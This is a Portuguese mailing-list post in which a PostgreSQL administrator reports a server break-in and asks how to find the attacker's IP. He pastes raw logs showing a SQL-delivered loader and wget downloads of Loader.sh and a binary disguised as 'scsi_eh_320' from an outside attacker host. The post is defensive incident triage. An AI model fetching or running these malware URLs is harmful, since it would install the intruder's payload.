Recentemente um cliente sofreu uma invasão pelo postgresql, a pessoa enviou um loader via sql e baixou vários arquivos maliciosos.
Alguém sabe como descobrir o IP da pessoa que acessou o postgresql que aparentemente não estou conseguindo. Estou verificando os logs e tenho somente isso: 2016-06-15 02:05:05 EDT [15644-1] postgres@sisrh FATAL: database "sisrh" does not exist --2016-06-15 06:31:16-- http://155.94.224.246:5432/Loader.sh Connecting to 155.94.224.246:5432... connected. HTTP request sent, awaiting response... 200 OK Length: 1058 (1.0K) [application/octet-stream] Saving to: ‘/tmp/Loader.sh’ 0K . 100% 86.9M=0s 2016-06-15 06:31:16 (86.9 MB/s) - ‘/tmp/Loader.sh’ saved [1058/1058] scsi_eh_128: no process found scsi_eh_128: no process found scsi_eh_128: no process found scsi_eh_256: no process found scsi_eh_256: no process found scsi_eh_256: no process found scsi_eh_512: no process found scsi_eh_512: no process found scsi_eh_512: no process found scsi_eh_56: no process found scsi_eh_56: no process found scsi_eh_56: no process found scsi_eh_56: no process found scsi_eh_320: no process found scsi_eh_320: no process found scsi_eh_320: no process found --2016-06-15 06:31:16-- http://155.94.224.246:5432/scsi_eh_320 Connecting to 155.94.224.246:5432... connected. HTTP request sent, awaiting response... 200 OK Length: 1334372 (1.3M) [application/octet-stream] Saving to: ‘/tmp/scsi_eh_320’ 0K .......... .......... .......... .......... .......... 3% 90.1K 14s -- Anderson Silva
_______________________________________________ pgbr-geral mailing list pgbr-geral@listas.postgresql.org.br https://listas.postgresql.org.br/cgi-bin/mailman/listinfo/pgbr-geral
